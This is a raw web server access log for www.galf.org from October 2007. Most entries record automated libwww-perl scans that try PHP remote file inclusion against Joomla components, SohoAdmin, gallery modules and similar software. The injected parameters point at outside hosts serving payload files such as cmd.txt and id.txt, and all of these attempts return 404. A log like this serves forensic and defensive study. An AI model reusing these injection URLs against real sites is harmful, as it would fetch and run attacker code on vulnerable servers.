72.29.73.171 - - [29/Oct/2007:14:15:23 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:14:15:49 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
69.93.209.250 - - [29/Oct/2007:14:15:49 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.26.117 - - [29/Oct/2007:14:17:40 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
68.180.250.117 - - [29/Oct/2007:14:17:41 -0700] "GET /logs/scripts.log HTTP/1.0" 200 417151 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
190.70.107.144 - - [29/Oct/2007:14:17:54 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.eldesbande.com/hi5/date.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.248.62.98 - - [29/Oct/2007:14:18:28 -0700] "GET /logs/access_070827.log/sohoadmin/program/modules/page_editor/includes/login.php?_SESSION[docroot_path]=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.248.62.98 - - [29/Oct/2007:14:18:29 -0700] "GET /sohoadmin/program/modules/page_editor/includes/login.php?_SESSION[docroot_path]=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.248.62.98 - - [29/Oct/2007:14:18:29 -0700] "GET /logs/sohoadmin/program/modules/page_editor/includes/login.php?_SESSION[docroot_path]=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.208.73.58 - - [29/Oct/2007:14:18:30 -0700] "GET /logs/access_070827.log/sohoadmin/program/modules/page_editor/includes/login.php?_SESSION[docroot_path]=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.208.73.58 - - [29/Oct/2007:14:18:30 -0700] "GET /sohoadmin/program/modules/page_editor/includes/login.php?_SESSION[docroot_path]=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.208.73.58 - - [29/Oct/2007:14:18:30 -0700] "GET /logs/sohoadmin/program/modules/page_editor/includes/login.php?_SESSION[docroot_path]=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
89.111.176.32 - - [29/Oct/2007:14:19:15 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.32 - - [29/Oct/2007:14:19:15 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.90.251.169 - - [29/Oct/2007:14:20:29 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.208.73.58 - - [29/Oct/2007:14:20:44 -0700] "GET /logs/access_070716.log/sohoadmin/program/modules/page_editor/includes/login.php?_SESSION[docroot_path]=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.248.62.98 - - [29/Oct/2007:14:21:19 -0700] "GET /logs/access_070716.log/sohoadmin/program/modules/page_editor/includes/login.php?_SESSION[docroot_path]=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.151.232.105 - - [29/Oct/2007:14:25:18 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
38.113.114.156 - - [29/Oct/2007:14:25:41 -0700] "GET /logs/access_070625.log HTTP/1.1" 206 102401 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; MyIE2; Maxthon)"
74.208.73.58 - - [29/Oct/2007:14:26:21 -0700] "GET /logs/sohoadmin/program/modules/page_editor/includes/login.php?_SESSION[docroot_path]=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.208.73.58 - - [29/Oct/2007:14:26:21 -0700] "GET /sohoadmin/program/modules/page_editor/includes/login.php?_SESSION[docroot_path]=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.151.232.105 - - [29/Oct/2007:14:26:39 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.151.232.105 - - [29/Oct/2007:14:26:40 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
38.113.114.156 - - [29/Oct/2007:14:26:47 -0700] "GET /logs/access_070625.log HTTP/1.1" 206 102401 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; MyIE2; Maxthon)" "www.galf.org"
67.15.78.74 - - [29/Oct/2007:14:27:17 -0700] "GET /logs/access_070917.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://dupa123.000webhost.info/z/ver3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.78.74 - - [29/Oct/2007:14:27:17 -0700] "GET //components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://dupa123.000webhost.info/z/ver3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.78.74 - - [29/Oct/2007:14:27:18 -0700] "GET /logs//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://dupa123.000webhost.info/z/ver3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:14:27:35 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:14:27:35 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
38.113.114.156 - - [29/Oct/2007:14:27:55 -0700] "GET /logs/access_070625.log HTTP/1.1" 206 102401 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; MyIE2; Maxthon)" "www.galf.org"
211.202.2.69 - - [29/Oct/2007:14:27:56 -0700] "GET /logs/access_070917.log//login.php?dir=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.202.2.69 - - [29/Oct/2007:14:27:56 -0700] "GET /logs/access_070917.log//login.php?dir=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.202.2.69 - - [29/Oct/2007:14:27:56 -0700] "GET /logs//login.php?dir=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.202.2.69 - - [29/Oct/2007:14:27:58 -0700] "GET /logs//login.php?dir=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.202.2.69 - - [29/Oct/2007:14:28:02 -0700] "GET /logs/access_070917.log//login.php?dir=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.202.2.69 - - [29/Oct/2007:14:28:07 -0700] "GET /logs//login.php?dir=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.78.74 - - [29/Oct/2007:14:28:55 -0700] "GET /logs/access_070820.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://dupa123.000webhost.info/z/ver3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.100.8.216 - - [29/Oct/2007:14:30:20 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.scan-bot.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.100.8.216 - - [29/Oct/2007:14:30:21 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.scan-bot.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.248.62.98 - - [29/Oct/2007:14:31:15 -0700] "GET /logs/sohoadmin/program/modules/page_editor/includes/login.php?_SESSION[docroot_path]=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.248.62.98 - - [29/Oct/2007:14:31:15 -0700] "GET /sohoadmin/program/modules/page_editor/includes/login.php?_SESSION[docroot_path]=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.157.188.77 - - [29/Oct/2007:14:32:08 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.157.188.77 - - [29/Oct/2007:14:32:14 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.30.216.107 - - [29/Oct/2007:14:32:18 -0700] "GET /logs/scripts.log HTTP/1.0" 200 417151 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
212.124.37.50 - - [29/Oct/2007:14:34:15 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.intelligent-design-forum.de/.admin/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.124.37.50 - - [29/Oct/2007:14:34:16 -0700] "GET /logs/access_070827.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.intelligent-design-forum.de/.admin/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.124.37.50 - - [29/Oct/2007:14:34:16 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.intelligent-design-forum.de/.admin/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.100.8.216 - - [29/Oct/2007:14:36:18 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.scan-bot.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.100.8.216 - - [29/Oct/2007:14:36:18 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.scan-bot.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:38:37 -0700] "GET /logs/access_070827.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:38:38 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
208.226.79.133 - - [29/Oct/2007:14:38:39 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.30.216.8 - - [29/Oct/2007:14:39:00 -0700] "GET /logs/access.log HTTP/1.0" 200 111286 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:39:25 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
190.70.107.144 - - [29/Oct/2007:14:39:26 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.eldesbande.com/hi5/date.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.70.107.144 - - [29/Oct/2007:14:39:26 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.eldesbande.com/hi5/date.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
208.226.79.133 - - [29/Oct/2007:14:39:26 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:39:38 -0700] "GET /logs/access_070826.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:41:57 -0700] "GET /logs/access_070827.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:41:58 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:42:10 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.157.188.77 - - [29/Oct/2007:14:43:12 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
12.22.179.203 - - [29/Oct/2007:14:43:15 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dienachtschwaermer.net/test/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
203.151.232.105 - - [29/Oct/2007:14:43:16 -0700] "GET /logs/access_070806.log/index.php?x=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.151.232.105 - - [29/Oct/2007:14:43:17 -0700] "GET /index.php?x=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.151.232.105 - - [29/Oct/2007:14:43:17 -0700] "GET /logs/index.php?x=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
202.157.188.77 - - [29/Oct/2007:14:43:18 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:43:22 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:43:22 -0700] "GET /logs/access_071001.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:43:22 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:43:26 -0700] "GET /logs/access_071001.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:43:26 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
208.226.79.133 - - [29/Oct/2007:14:43:27 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:44:05 -0700] "GET /logs/access_071008.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:44:17 -0700] "GET /logs/access_070903.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:44:18 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
208.226.79.133 - - [29/Oct/2007:14:44:18 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.33.217 - - [29/Oct/2007:14:44:38 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
12.22.179.203 - - [29/Oct/2007:14:44:48 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://dienachtschwaermer.net/test/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
87.230.33.217 - - [29/Oct/2007:14:44:50 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:14:44:56 -0700] "GET //mcf.php?content=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:45:01 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.29.73.171 - - [29/Oct/2007:14:45:03 -0700] "GET //mcf.php?content=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:45:14 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:45:51 -0700] "GET /logs/access_070730.log//modules/My_eGallery/index.php?basepath=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:45:51 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:45:51 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
208.226.79.133 - - [29/Oct/2007:14:45:52 -0700] "GET /logs/access_070702.log//modules/My_eGallery/index.php?basepath=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:46:31 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [29/Oct/2007:14:47:18 -0700] "GET /logs/access_070827.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
190.40.7.230 - - [29/Oct/2007:14:47:20 -0700] "GET / HTTP/1.1" 200 1048 "http://www.runa.org.pe/divsexual/enlaces.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.galf.org"
87.119.200.212 - - [29/Oct/2007:14:47:23 -0700] "GET /logs//index.php?go=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.119.200.212 - - [29/Oct/2007:14:47:23 -0700] "GET //index.php?go=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
190.40.7.230 - - [29/Oct/2007:14:47:23 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.galf.org"
190.40.7.230 - - [29/Oct/2007:14:47:28 -0700] "GET / HTTP/1.1" 200 1048 "http://www.runa.org.pe/divsexual/enlaces.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.galf.org"
62.193.228.196 - - [29/Oct/2007:14:47:30 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
190.70.107.144 - - [29/Oct/2007:14:47:48 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.eldesbande.com/hi5/date.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.70.107.144 - - [29/Oct/2007:14:47:48 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.eldesbande.com/hi5/date.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:14:50:01 -0700] "GET /logs/access_071008.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:14:50:02 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:14:50:02 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.151.232.105 - - [29/Oct/2007:14:50:03 -0700] "GET /logs/access_070730.log/index.php?x=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:14:50:13 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.10.71 - - [29/Oct/2007:14:50:32 -0700] "GET /logs//index.php?go=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.10.71 - - [29/Oct/2007:14:50:32 -0700] "GET //index.php?go=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.202.161.250 - - [29/Oct/2007:14:50:44 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
195.202.161.250 - - [29/Oct/2007:14:50:44 -0700] "GET //skin/zero_vote/error.php?dir=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
195.202.161.250 - - [29/Oct/2007:14:50:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
195.202.161.250 - - [29/Oct/2007:14:51:16 -0700] "GET /logs/access_071001.log//skin/zero_vote/error.php?dir=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.193.248.204 - - [29/Oct/2007:14:51:18 -0700] "GET /logs/middle.php?page=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.248.204 - - [29/Oct/2007:14:51:18 -0700] "GET /middle.php?page=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.20.162 - - [29/Oct/2007:14:52:05 -0700] "GET /tmp/?D=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.241.196.84 - - [29/Oct/2007:14:52:12 -0700] "GET /logs/access_070723.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gds.hu/voodoo/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.151.232.105 - - [29/Oct/2007:14:52:29 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.151.232.105 - - [29/Oct/2007:14:52:29 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.106.128.100 - - [29/Oct/2007:14:53:04 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.128.100 - - [29/Oct/2007:14:53:04 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.157.188.77 - - [29/Oct/2007:14:53:18 -0700] "GET /logs/access_070716.log/index.php?go=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
202.157.188.77 - - [29/Oct/2007:14:53:24 -0700] "GET /logs/index.php?go=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.128.100 - - [29/Oct/2007:14:53:30 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.128.100 - - [29/Oct/2007:14:53:30 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.128.100 - - [29/Oct/2007:14:53:34 -0700] "GET /logs/access_071001.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
